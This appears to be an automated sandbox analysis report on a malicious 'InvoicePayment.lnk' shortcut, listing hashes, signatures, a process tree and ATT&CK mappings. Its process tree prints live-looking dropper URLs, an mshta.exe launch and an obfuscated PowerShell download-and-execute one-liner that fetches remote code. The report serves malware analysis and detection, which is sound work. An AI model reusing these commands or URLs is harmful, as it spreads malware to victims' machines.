83bc020498d9001a23acf434ab33346aea54c19fd27040751e2e61c8cd793b51

General

Target

InvoicePayment.lnk
Size

2KB
MD5

0e2623d2481a945842960b2d96759d32
SHA1

86ad7f3465926187a5243aad50e25e88d8fb716e
SHA256

83bc020498d9001a23acf434ab33346aea54c19fd27040751e2e61c8cd793b51
SHA512

6503c4f1dd32a69c873020b95e36f794bfd1f2f00a14f3f73da5ff9902bce22dabff513ce47348c447cac1e88d82654951865baf4d1f767920308e68c9546c3a

Score

10^/10

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

https://www.minpic.de/k/bgmj/168l7q/

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://www.minpic.de/k/bgmi/113snm/

Signatures

Blocklisted process makes network request 3 IoCs

Processes:

mshta.exepowershell.exe

flow pid process

6 884 mshta.exe
8 884 mshta.exe
9 776 powershell.exe

flow	pid	process
6	884	mshta.exe
8	884	mshta.exe
9	776	powershell.exe

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main mshta.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid process

776 powershell.exe
776 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 776 powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

pid	process
776	powershell.exe
776	powershell.exe

description	pid	process
Token: SeDebugPrivilege	776	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

cmd.exemshta.exe

description	pid	process	target process
PID 1640 wrote to memory of 884	1640	cmd.exe	mshta.exe
PID 1640 wrote to memory of 884	1640	cmd.exe	mshta.exe
PID 1640 wrote to memory of 884	1640	cmd.exe	mshta.exe
PID 884 wrote to memory of 776	884	mshta.exe	powershell.exe
PID 884 wrote to memory of 776	884	mshta.exe	powershell.exe
PID 884 wrote to memory of 776	884	mshta.exe	powershell.exe

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\InvoicePayment.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:1640

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "https://www.minpic.de/k/bgmj/168l7q/"
2⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:884

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I`EX ((n`e`W`-Obj`E`c`T (('Net'+'.'+'Webc'+'lient'))).(('D'+'o'+'w'+'n'+'l'+'o'+'a'+'d'+'s'+'tri'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'n'+'g')).InVokE((('https://www.minpic.de/k/bgmi/113snm/'))))
3⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:776

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/776-4-0x0000000000000000-mapping.dmp

Download
memory/776-5-0x000007FEF35D0000-0x000007FEF3FBC000-memory.dmp

Filesize
9.9MB

Download
memory/776-6-0x0000000001DA0000-0x0000000001DA1000-memory.dmp

Filesize
4KB

Download
memory/776-7-0x000000001AC80000-0x000000001AC81000-memory.dmp

Filesize
4KB

Download
memory/776-8-0x0000000002580000-0x0000000002581000-memory.dmp

Filesize
4KB

Download
memory/776-9-0x0000000001E70000-0x0000000001E71000-memory.dmp

Filesize
4KB

Download
memory/776-10-0x000000001B7F0000-0x000000001B7F1000-memory.dmp

Filesize
4KB

Download
memory/776-11-0x0000000002640000-0x0000000002641000-memory.dmp

Filesize
4KB

Download
memory/776-12-0x0000000002860000-0x0000000002861000-memory.dmp

Filesize
4KB

Download
memory/776-13-0x0000000002890000-0x0000000002891000-memory.dmp

Filesize
4KB

Download
memory/884-2-0x0000000000000000-mapping.dmp

Download
memory/1972-3-0x000007FEF7B10000-0x000007FEF7D8A000-memory.dmp

Filesize
2.5MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads